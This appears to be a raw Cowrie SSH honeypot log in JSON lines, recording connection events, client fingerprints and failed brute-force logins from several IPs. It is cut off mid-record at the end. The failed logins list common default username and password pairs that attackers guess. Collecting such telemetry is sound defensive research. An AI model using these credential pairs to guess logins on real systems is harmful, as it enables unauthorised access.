{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46638,"dst_ip":"1.2.3.4","dst_port":22,"session":"7376399ce24c","protocol":"ssh","message":"New connection: 212.227.235.229:46638 (1.2.3.4:22) [session: 7376399ce24c]","sensor":"my-vps","timestamp":"2025-08-31T02:41:58.212992Z"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":50178,"dst_ip":"1.2.3.4","dst_port":22,"session":"25b975ef9ba9","protocol":"ssh","message":"New connection: 41.226.27.251:50178 (1.2.3.4:22) [session: 25b975ef9ba9]","sensor":"my-vps","timestamp":"2025-08-31T02:41:59.118788Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:41:59.187494Z","src_ip":"41.226.27.251","session":"25b975ef9ba9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:41:59.188239Z","src_ip":"41.226.27.251","session":"25b975ef9ba9"}
{"eventid":"cowrie.login.failed","username":"uftp","password":"uftp123","message":"login attempt [uftp/uftp123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:41:59.365018Z","src_ip":"41.226.27.251","session":"25b975ef9ba9"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:42:00.597347Z","src_ip":"41.226.27.251","session":"25b975ef9ba9"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:42:12.618773Z","src_ip":"212.227.235.229","session":"7376399ce24c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:42:12.620305Z","src_ip":"212.227.235.229","session":"7376399ce24c"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":62506,"dst_ip":"1.2.3.4","dst_port":22,"session":"e6890b09ce34","protocol":"ssh","message":"New connection: 217.72.205.35:62506 (1.2.3.4:22) [session: e6890b09ce34]","sensor":"my-vps","timestamp":"2025-08-31T02:42:13.300138Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:42:13.301265Z","src_ip":"217.72.205.35","session":"e6890b09ce34"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40696,"dst_ip":"1.2.3.4","dst_port":22,"session":"90a4523902d0","protocol":"ssh","message":"New connection: 212.227.235.229:40696 (1.2.3.4:22) [session: 90a4523902d0]","sensor":"my-vps","timestamp":"2025-08-31T02:42:17.898731Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:42:18.631522Z","src_ip":"212.227.235.229","session":"90a4523902d0"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:42:18.632286Z","src_ip":"212.227.235.229","session":"90a4523902d0"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":43530,"dst_ip":"1.2.3.4","dst_port":22,"session":"35a4af41431c","protocol":"ssh","message":"New connection: 41.226.27.251:43530 (1.2.3.4:22) [session: 35a4af41431c]","sensor":"my-vps","timestamp":"2025-08-31T02:42:19.330110Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:42:19.331014Z","src_ip":"41.226.27.251","session":"35a4af41431c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:42:19.379329Z","src_ip":"41.226.27.251","session":"35a4af41431c"}
{"eventid":"cowrie.login.failed","username":"data","password":"data","message":"login attempt [data/data] failed","sensor":"my-vps","timestamp":"2025-08-31T02:42:19.523085Z","src_ip":"41.226.27.251","session":"35a4af41431c"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:42:20.702008Z","src_ip":"41.226.27.251","session":"35a4af41431c"}
{"eventid":"cowrie.login.failed","username":"es","password":"abc123","message":"login attempt [es/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:42:24.727517Z","src_ip":"212.227.235.229","session":"90a4523902d0"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:42:26.527738Z","src_ip":"212.227.235.229","session":"90a4523902d0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40396,"dst_ip":"1.2.3.4","dst_port":22,"session":"6492e60a746f","protocol":"ssh","message":"New connection: 212.227.125.160:40396 (1.2.3.4:22) [session: 6492e60a746f]","sensor":"my-vps","timestamp":"2025-08-31T02:42:33.582298Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59578,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c219eb227d0","protocol":"ssh","message":"New connection: 212.227.125.160:59578 (1.2.3.4:22) [session: 6c219eb227d0]","sensor":"my-vps","timestamp":"2025-08-31T02:42:39.309266Z"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":54846,"dst_ip":"1.2.3.4","dst_port":22,"session":"98933e2f2011","protocol":"ssh","message":"New connection: 41.226.27.251:54846 (1.2.3.4:22) [session: 98933e2f2011]","sensor":"my-vps","timestamp":"2025-08-31T02:42:39.631382Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:42:39.632643Z","src_ip":"41.226.27.251","session":"98933e2f2011"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:42:39.675693Z","src_ip":"41.226.27.251","session":"98933e2f2011"}
{"eventid":"cowrie.login.failed","username":"bigdata","password":"bigdata","message":"login attempt [bigdata/bigdata] failed","sensor":"my-vps","timestamp":"2025-08-31T02:42:39.808186Z","src_ip":"41.226.27.251","session":"98933e2f2011"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:42:39.896366Z","src_ip":"212.227.125.160","session":"6c219eb227d0"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:42:39.897334Z","src_ip":"212.227.125.160","session":"6c219eb227d0"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:42:41.021550Z","src_ip":"41.226.27.251","session":"98933e2f2011"}
{"eventid":"cowrie.login.failed","username":"es","password":"abc123","message":"login attempt [es/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:42:42.237898Z","src_ip":"212.227.125.160","session":"6c219eb227d0"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:42:43.662477Z","src_ip":"212.227.125.160","session":"6c219eb227d0"}
{"eventid":"cowrie.login.failed","username":"user","password":"user","message":"login attempt [user/user] failed","sensor":"my-vps","timestamp":"2025-08-31T02:42:45.133076Z","src_ip":"212.227.235.229","session":"7376399ce24c"}
{"eventid":"cowrie.session.closed","duration":"20.0","message":"Connection lost after 20.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:42:53.563409Z","src_ip":"212.227.125.160","session":"6492e60a746f"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":38424,"dst_ip":"1.2.3.4","dst_port":22,"session":"d14279f96c01","protocol":"ssh","message":"New connection: 41.226.27.251:38424 (1.2.3.4:22) [session: d14279f96c01]","sensor":"my-vps","timestamp":"2025-08-31T02:42:59.927417Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:42:59.928525Z","src_ip":"41.226.27.251","session":"d14279f96c01"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:42:59.972312Z","src_ip":"41.226.27.251","session":"d14279f96c01"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"!QAZ@wsx","message":"login attempt [oracle/!QAZ@wsx] failed","sensor":"my-vps","timestamp":"2025-08-31T02:43:00.102753Z","src_ip":"41.226.27.251","session":"d14279f96c01"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:43:01.361744Z","src_ip":"41.226.27.251","session":"d14279f96c01"}
{"eventid":"cowrie.session.closed","duration":"67.5","message":"Connection lost after 67.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:43:05.729784Z","src_ip":"212.227.235.229","session":"7376399ce24c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50072,"dst_ip":"1.2.3.4","dst_port":22,"session":"8cbcea7dc235","protocol":"ssh","message":"New connection: 212.227.235.229:50072 (1.2.3.4:22) [session: 8cbcea7dc235]","sensor":"my-vps","timestamp":"2025-08-31T02:43:17.731397Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:43:18.693274Z","src_ip":"212.227.235.229","session":"8cbcea7dc235"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:43:18.694078Z","src_ip":"212.227.235.229","session":"8cbcea7dc235"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":49444,"dst_ip":"1.2.3.4","dst_port":22,"session":"96101259b36f","protocol":"ssh","message":"New connection: 41.226.27.251:49444 (1.2.3.4:22) [session: 96101259b36f]","sensor":"my-vps","timestamp":"2025-08-31T02:43:20.750184Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:43:20.751137Z","src_ip":"41.226.27.251","session":"96101259b36f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:43:20.795980Z","src_ip":"41.226.27.251","session":"96101259b36f"}
{"eventid":"cowrie.login.failed","username":"plex","password":"plex","message":"login attempt [plex/plex] failed","sensor":"my-vps","timestamp":"2025-08-31T02:43:20.931057Z","src_ip":"41.226.27.251","session":"96101259b36f"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:43:22.169051Z","src_ip":"41.226.27.251","session":"96101259b36f"}
{"eventid":"cowrie.login.failed","username":"ftptest","password":"123456","message":"login attempt [ftptest/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T02:43:24.495571Z","src_ip":"212.227.235.229","session":"8cbcea7dc235"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:43:26.393010Z","src_ip":"212.227.235.229","session":"8cbcea7dc235"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55264,"dst_ip":"1.2.3.4","dst_port":22,"session":"e00aa5cff811","protocol":"ssh","message":"New connection: 212.227.235.229:55264 (1.2.3.4:22) [session: e00aa5cff811]","sensor":"my-vps","timestamp":"2025-08-31T02:43:28.619546Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:43:34.977780Z","src_ip":"212.227.235.229","session":"e00aa5cff811"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-s